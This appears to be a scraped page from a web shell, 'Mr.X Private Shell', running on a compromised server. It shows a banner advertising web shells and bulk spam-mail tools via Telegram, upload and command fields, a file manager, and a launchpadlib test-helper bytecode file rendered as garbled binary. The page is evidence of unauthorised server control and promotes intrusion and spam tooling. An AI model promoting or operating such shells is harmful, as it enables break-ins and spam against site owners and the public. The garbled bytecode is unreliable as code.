__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
�

�w�g���0�Sr/SQrSSKJr SSKrSSKJr SSKJrJ	r	J
r
 \"5rSr
"SS	\
5r"S
S\5r"SS
\5r\S5r"SS5r"SS5r"SS5r"SS5r\"SS5r\"SS5r\"SS5rg)zlaunchpadlib testing helpers.)
�BadSaveKeyring�fake_keyring�FauxSocketModule�InMemoryKeyring�NoNetworkAuthorizationEngine�NoNetworkLaunchpad�TestableLaunchpad�nopriv_read_nonprivate�salgado_read_nonprivate�salgado_with_full_permissions�)�contextmanagerN)�	Launchpad)�AccessToken�Credentials�RequestTokenAuthorizationEnginec�^�[[RS[5[LdS5eg)N�keyringz>During tests the real keyring module should never be imported.)�getattr�launchpadlib�credentials�missing���>/usr/lib/python3/dist-packages/launchpadlib/testing/helpers.py�assert_keyring_not_importedr0s+����(�(�)�W�=��H�H�G�H�Hrc�<^�\rSrSrSrSrU4SjrSrSrSr	U=r
$)r�6aAn authorization engine that doesn't open a web browser.

You can use this to test the creation of Launchpad objects and the
storing of credentials. You can't use it to interact with the web
service, since it only pretends to authorize its OAuth request tokens.
z
access_key:84c�B>�[TU]"U0UD6 SUlSUlg)Nr)�super�__init__�request_tokens_obtained�access_tokens_obtained)�self�args�kwargs�	__class__s   �rr �%NoNetworkAuthorizationEngine.__init__@s%���
���$�)�&�)�'(��$�&'��#rc�.�U=RS-
slg)zcPretend to get a request token from the server.

We do this by simply returning a static token ID.
�zrequest_token:42)r!)r#rs  r�get_request_token�.NoNetworkAuthorizationEngine.get_request_tokenFs��
	
�$�$��)�$�!rc�d�[URS5UlU=RS-
slg)zrPretend to exchange a request token for an access token.

We do this by simply setting the access_token property.
zaccess_secret:168r)N)r�ACCESS_TOKEN_KEY�access_tokenr")r#r�
request_tokens   r�make_end_user_authorize_token�:NoNetworkAuthorizationEngine.make_end_user_authorize_tokenNs0��
$/��!�!�#6�$
�� �	
�#�#�q�(�#r)r"r!)�__name__�
__module__�__qualname__�__firstlineno__�__doc__r-r r*r0�__static_attributes__�
__classcell__�r&s@rrr6s$����'��(�"�)�)rrc�.�\rSrSrSrSr\S5rSrg)r�Yz�A Launchpad instance for tests with no network access.

It's only useful for making sure that certain methods were called.
It can't be used to interact with the API.
c	�L�XlX lX0l[UUUUUS9Ulg)N��service_root�cache�timeout�
proxy_info�version)r�authorization_engine�credential_store�dict�passed_in_args)	r#rrCrDr>r?r@rArBs	         rr �NoNetworkLaunchpad.__init__`s2��'��$8�!� 0��"�%���!��
��rc��[U6$�N)r)�clsr$s  r�authorization_engine_factory�/NoNetworkLaunchpad.authorization_engine_factoryvs
��+�T�2�2r)rCrDrrFN)	r2r3r4r5r6r �classmethodrKr7rrrrrYs ���
�,�3��3rrc�R^�\rSrSrSrSSSSSS\R4U4SjjrSrU=r	$)r�{z5A base class for talking to the testing root service.N�test_devc	�.>�[T	U]UUUUUUUUS9 g)a,Provide test-friendly defaults.

:param authorization_engine: Defaults to None, since a test
    environment can't use an authorization engine.
:param credential_store: Defaults to None, since tests
    generally pass in fully-formed Credentials objects.
:param service_root: Defaults to 'test_dev'.
r=N)rr )
r#rrCrDr>r?r@rArBr&s
         �rr �TestableLaunchpad.__init__~s/���&	���� ��%���!��	�		
rr)
r2r3r4r5r6r�DEFAULT_VERSIONr r7r8r9s@rrr{s-���?�
"�������)�)�
�
rrc#�# �[5 U[Rl[[RlSv� [R?[R?g![R?[R?f=f7f)zAA context manager which injects a testing keyring implementation.N)rrrr�RuntimeError�NoKeyringError)�fakes rrr�sd��� �!�'+�L���$�.:�L���+�4�
��$�$�,��$�$�3��
�$�$�,��$�$�3�s�9B�A!�!B�!"B�Bc��\rSrSrSrSrSrg)r�z:A socket module replacement that provides a fake hostname.c��g)N�HOSTNAMEr�r#s r�gethostname�FauxSocketModule.gethostname�s��rrN)r2r3r4r5r6r]r7rrrrr�s
��D�rrc�$�\rSrSrSrSrSrSrg)r�z6A keyring that generates errors when saving passwords.c��grIr�r#�service�usernames   r�get_password�BadSaveKeyring.get_password�s��rc��[erI)rU�r#rcrd�passwords    r�set_password�BadSaveKeyring.set_password�s���rrN)r2r3r4r5r6rerjr7rrrrr�s��@��rrc�*�\rSrSrSrSrSrSrSrg)r�z.A keyring that saves passwords only in memory.c��0UlgrI��datar\s rr �InMemoryKeyring.__init__�s	����	rc�"�X0RX4'grIrorhs    rrj�InMemoryKeyring.set_password�s��'/�	�	�'�#�$rc�:�URRX45$rI)rp�getrbs   rre�InMemoryKeyring.get_password�s���y�y�}�}�g�0�1�1rroN)	r2r3r4r5r6r rjrer7rrrrr�s��8��0�2rrc�D�\rSrSrSrSrSSS\R4SjrSr	g)�KnownTokens��z'Known access token/secret combinations.c�n�XlX l[X5Ul[	SURS9Ulg)Nzlaunchpad-library)�
consumer_namer.)�token_string�
access_secretr�tokenrr)r#r|r}s   rr �KnownTokens.__init__�s0��(��*�� ��=��
�&�-�D�J�J�
��rNc�0�[URUUUUS9$)z2Create a Launchpad object using these credentials.)r?r@rArB)rr)r#r?r@rArBs     r�login�KnownTokens.login�s&��!������!��
�	
r)r}rr~r|)
r2r3r4r5r6r rrSr�r7rrrrxrx�s#��1�
�����)�)�
rrxzsalgado-change-anything�testzsalgado-read-nonprivate�secretznopriv-read-nonprivate�mystery)r6�__all__�
contextlibr
r�launchpadlib.launchpadr�launchpadlib.credentialsrrr�objectrrrrrrrrrrxrr
r	rrr�<module>r�s���&$���&��,����(��H� )�#B� )�F3��3�D
�	�
�D�
4��
4�����
2�
2�
�
�8!,�,E�v� N��%�&?��J��$�%=�y�I�r

Filemanager

Name Type Size Permission Actions
__init__.cpython-313.pyc File 160 B 0644
helpers.cpython-313.pyc File 8.2 KB 0644
launchpad.cpython-313.pyc File 25.11 KB 0644
resources.cpython-313.pyc File 1.65 KB 0644
Filemanager